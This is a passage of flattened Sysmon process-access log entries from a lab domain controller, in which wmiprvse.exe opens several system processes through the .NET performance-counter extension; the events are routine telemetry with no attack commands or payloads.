13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005845Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005844Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005843Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005842Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005841Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005840Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005839Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005838Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005837Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005836Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005835Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005834Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005833Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005832Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005831Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005830Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005829Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005828Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005827Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005826Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005825Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005824Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005823Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005822Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 